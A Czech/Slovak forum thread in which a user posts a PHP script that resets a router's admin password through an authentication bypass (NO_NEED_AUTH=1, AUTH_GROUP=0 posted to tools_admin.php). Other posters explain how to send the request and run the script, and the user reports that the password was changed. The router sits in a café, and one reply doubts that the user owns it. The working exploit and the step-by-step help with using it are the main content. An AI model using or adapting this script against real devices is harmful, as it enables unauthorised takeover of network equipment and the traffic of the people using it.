Jak spustit PHP skript?
Dobrý den,
testuji jestli je můj router odolný proti útokům a a prý by se do něj šlo dostat tímto PHP skriptem:
<?php
if(sizeof($argv)!=4) {
echo "Usage: php5 $argv[0] <router ip addres> <port>
<admin password>\n";
exit;
}
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_PORT, $argv[2]);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,
"ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AU
TH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=".urlencode($argv[3])
);
echo "+ starting request\n";
$out = curl_exec($ch);
if($out===false) {
echo "- Error: could not connect (
http://$argv[1]:$argv[2]/tools_admin.php).\n";
exit;
} else
echo "+ request sended\n";
curl_close($ch);
if(stripos($out,"Successfully")===false) {
echo "- something goes wrong (check answer - answer.html) !\n";
$f=fopen("answer.html","w"); fwrite($f,$out); fclose($f);
exit;
}
else
echo "+ ok, now you can login using l: admin p:$argv[3]\n";
?>Je to možné ? A vysvětlila by mi nějaká dobrá duše jak to nechám ten router "sežrat" ? Děkuji!
Máš veřejnou IP adresu? Pokud ne, nemusí tě nějaký PHP skript trápit...
No ten router je totiž u nás v café kavárně a protože je tam hodně lidí, nikdo nikdy neví, ale mě de o princip, jak můžu spustit jakýkoliv PHP skript?
Vstup toho scriptu je admin password, takze nechapem co akoze ma ten script prelamovat ked do neho musis heslo zadat.
A php script sa spusta na php serveri. Ak sa ti zda ze pisem po spanielsky tak na to kasli a rob nieco uzitocnejsie.
Ono to tě to dotoho routeru pustí když tam dáš za php ?NO_NEED_AUTH=1&AUTH_GROUP=0, ale nemůžeš na nic kliknout, potom to chce login
//edit: del, som to predym hned nepochoopil :D
Ma to fungovat tak ze das parametre
a tym sa ma zmenit admin heslo administracie routera na NOVEHESLO ktore si tam napisal nakoniec toho riadku
Zkusil jsem tedy zadat do prohlížeče:
a vypadá to že se nezměnilo. Buď má firmware tuhle bezpečností díru opravenou a nebo jsem udělal něco špatně?
Děkuji.
No jedna vec je ze nie som si isty ci nema byt na zaciatku to Action_post,
a druha vec je ze ten PHP script to posiela sposobom POST, a ne z URL riadku (to je metoda GET), a to neni to same.
Ked to chces silou mocou testovat nainstaluj si nejaky PHP server janeviem apache a spust si ten php script v nom. Ale upozornujem ze nastavit PHP server neni uplne trivialna vec pre zaciatocnikov.
Dobrý den, nevím jak vám poděkovat, ale heslo se opravdu ZMĚNILO !!! Jste kouzelník a moc vám děkuji ! Opravdu nevím jak se vám odvděčit a moc vám jsem vděčný ! Děkuji moc ještě jednou !
Ked tak dakujes tak zacinam pochybovat ze to je tvoj router :D
Teoreticky mozno by slo v nom obmedzit aby sa nedalo pripajat na konfiguracne rouzhranie cez wifi, ale zhlavy neviem, mozno v sekcii firewall apod.
Dle mého názoru, by pomohlo jen update firmwaru nebo DD-WRT. Router je můj a ano děkuji vám :) Je to moje první zařízení do kterého jsem se dokázal dostat bez nějakého programu, teda vy jste mi pomohl, ale stejně je to úspěch